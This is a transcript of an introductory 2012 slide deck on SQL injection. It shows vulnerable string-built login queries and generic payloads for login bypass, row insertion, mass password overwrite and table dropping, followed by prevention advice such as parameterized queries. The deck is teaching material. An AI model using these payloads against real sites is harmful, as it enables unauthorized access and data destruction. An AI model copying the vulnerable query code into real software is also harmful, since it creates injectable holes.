Upgrade to Pro — share decks privately, control downloads, hide ads and more …

SQL Injection

SQL Injection

A Basic Presentation about the SQL Injection and how it works

Bhaskar Machcha

October 12, 2012
Tweet

More Decks by Bhaskar Machcha

Other Decks in Programming

Transcript

  1. What is SQL?  SQL Stands for Structured Query Language.

     Allows us to access the Database.  SQL Can:  Executes a queries against database.  Retrieve data from database.  Insert new records in database.  Delete record from database.
  2. What is SQL Injection? The ability to Inject SQL commands

    into the database engine through an existing application…
  3. How common it is?  It is probably the most

    common Website vulnerability today!  It is a flaw in "web application" development, it is not a DB or web server problem  In our pen tests over 60% of our clients turn out to be vulnerable to SQL Injection
  4. Vulnerable Applications…  All most all the databases are vulnerable..

     MS SQL Server  Oracle  MySQL  Postgres  DB2  MS Access  Sybase, etc.
  5. How it Works?  Common vulnerable login query SELECT *

    FROM users WHERE login = 'victor' AND password = '123' (If it returns something then login!)  ASP/MS SQL Server login syntax var sql = "SELECT * FROM users WHERE login = '" + formusr + "' AND password = '" + formpwd + "'";
  6. Injecting through Strings. formusr = ' or 1=1 – –

    formpwd = anything  Final query would look like this: SELECT * FROM users WHERE username = ' ' or 1=1 – – AND password = 'anything'
  7. The Power of ‘  It closes the string parameter.

     Everything after is considered part of the SQL command  Misleading Internet suggestions include:  Escape it! : replace ' with ' ‘  String fields are very common but there are other types of fields:  Numeric  Dates
  8. If it were numeric? SELECT * FROM clients WHERE account

    = 12345678 AND pin = 1111  PHP/MySQL login syntax $sql = "SELECT * FROM clients WHERE " . "account = $formacct AND " . "pin = $formpin";
  9. Injecting Numeric Field? $formacct = 1 or 1=1 # $formpin

    = 1111  Final query would look like this: SELECT * FROM clients WHERE account = 1 or 1=1 # AND pin = 1111
  10. SQL Injection Characters…  ' or " character String Indicators

     -- or # single-line comment  /*…*/ multiple-line comment  + addition, concatenate (or space in url)  || (double pipe) concatenate  % wildcard attribute indicator  ?Param1=foo&Param2=bar URL Parameters  PRINT useful as non transactional command  @variable local variable  @@variable global variable  waitfor delay '0:0:10' time delay
  11. Inserting Data into Db.  By using the following code

    you can insert the data in the Database of website… B’; insert into <tablename> values (<col1,col2...>); --  Example: B’; insert into signup values(55,’Abc’,’xxx’,’yyy’); --
  12. Updating the data..  By using the following code we

    can update the passwords of all the users…  Syntax: X’; update <tablename> set pass=‘<yourvalues>’; --  Example: X’; update signup set pass=‘nnn’; --
  13. Dropping the tables  You can also drop the tables

    of the victims web application..  Syntax: X’; drop table <tablename>; --  Example: X’; drop table signup; --
  14. Impact of SQL Injections  Leakage of sensitive information. 

    Reputation decline.  Modification of sensitive information.
  15. SQL Injection Attacks are Serious Threat OSWAP Vulnerabilities (2004) OSWAP

    Vulnerabilities (2006) Card Systems security breach(2006): 263,000 customer credit card numbers stolen, 40 Million more exposed
  16. Preventing SQL Injection  Use parameterized Select sql = "select

    * from Users where user = @user and pwd = @pwd"; SqlCommand cmd = new SqlCommand(sql,con); cmd.Parameters.Add("@user",User.Text); cmd.Parameters.Add("@pwd",Password.Text);  Use Stored Procedures
  17. Continued..  Restrict Function access from PUBLIC to PRIVATE 

    Don't display error messages that tell everything about the database.  Password Hash Codes  Database Specific User Privileges
  18. Conclusion  SQL Injection continues to evolve with new technologies

     Dangerous Effects  Access to critical information  Updating data not meant to be updated  Exploiting DBMS to directly affect the server and its resources  Prevention of SQL Injection  Input Validation and Query Building  Permissions and Access Rights  Variable Placeholders (Prepare) and Stored Procedures